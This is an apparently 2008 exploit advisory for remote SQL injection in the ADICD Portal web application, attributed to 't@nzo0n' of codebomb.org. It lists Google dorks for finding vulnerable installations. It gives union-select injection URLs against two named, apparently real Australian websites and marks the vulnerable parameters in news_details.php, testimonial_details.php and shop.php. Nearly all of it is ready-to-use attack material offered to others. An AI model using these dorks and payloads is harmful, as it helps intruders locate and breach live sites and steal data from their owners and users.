ADICD Portal suffers from multiple SQL injection vulnerabilities.
33fa3b5bc7fb8015aa5e67d1a5cfe413-+===#===#===#===#===#===#===#===#===#===#===+-
-+===# ADICD Portal Remote Sql Injection #===+-
-+===#===#===#===#===#===#===#===#===#===#===+-
[x] Author | t@nzo0n
[x] Site | codebomb.org
[x] Date | 17 June 2008
[+] D0rk 1 | Powered by ADICD
[+] D0rk 2 | Powered by ADICD + inurl:/shop.php?cid=
[+] D0rk 3 | Powered by ADICD + inurl:/product.detail.php
[+] D0rk 4 | Powered by ADICD + inurl:shop.php?pid=
[+] D0rk 5 | Powered by ADICD + inurl:news_details.php?news_id=
e.g : http://www.pro-check.com.au/testimonial_details.php?testimonial_id=67+union+select+1,2,3,4,5,6--
: http://www.occasio.com.au/news_details.php?news_id=18+union+select+1,2,3,4,5,6%20--
[+] 3xpl0it | www.site.com/[path]/news_details.php?news_id=[SQL]
| www.site.com/[path]/testimonial_details.php?testimonial_id=[SQL]
| www.site.com/[path]/shop.php?cid= [SQL]
And so on...
[x] Greetz | All code bombers :P
Comments
No comments yet, be the first!